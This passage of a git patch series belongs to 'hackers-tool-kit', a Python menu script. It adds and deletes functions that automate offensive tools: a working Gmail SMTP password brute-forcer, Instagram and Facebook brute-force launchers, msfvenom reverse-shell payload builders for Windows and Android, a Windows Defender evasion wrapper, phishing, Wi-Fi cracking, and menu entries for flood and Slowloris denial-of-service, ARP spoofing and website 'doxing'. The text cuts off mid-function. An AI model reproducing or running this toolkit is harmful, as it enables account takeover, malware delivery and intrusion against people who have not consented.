+#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + +#ABOUT ME / THE CREATOR START# +#----------------------------# +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +#--------------------------# +#ABOUT ME / THE CREATOR END# + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From ecbf80e6ef51610b4a657b8ea7c1be110021cc16 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 19 Apr 2019 16:38:01 +0100 Subject: [PATCH 094/214] Update README.md --- README.md | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index da9c4a8..83278ae 100644 --- a/README.md +++ b/README.md @@ -38,11 +38,8 @@ the htksecure.py file will run the hackers-tool-kit with proxychains and other t this is where i will try to put the most recent updates - -* added a web directory scanner option - -* updated exploits.txt and payloads.txt - * added comments to code making it easier too read * added a option to start a server via apache + +* added a clearall and a run option From 18ddde0a4364cf0ff66d249c811e1510ab8fb03a Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 8 May 2019 00:49:03 +0100 Subject: [PATCH 095/214] Delete htk.py --- htk.py | 2543 -------------------------------------------------------- 1 file changed, 2543 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 435526b..0000000 --- a/htk.py +++ /dev/null @@ -1,2543 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = 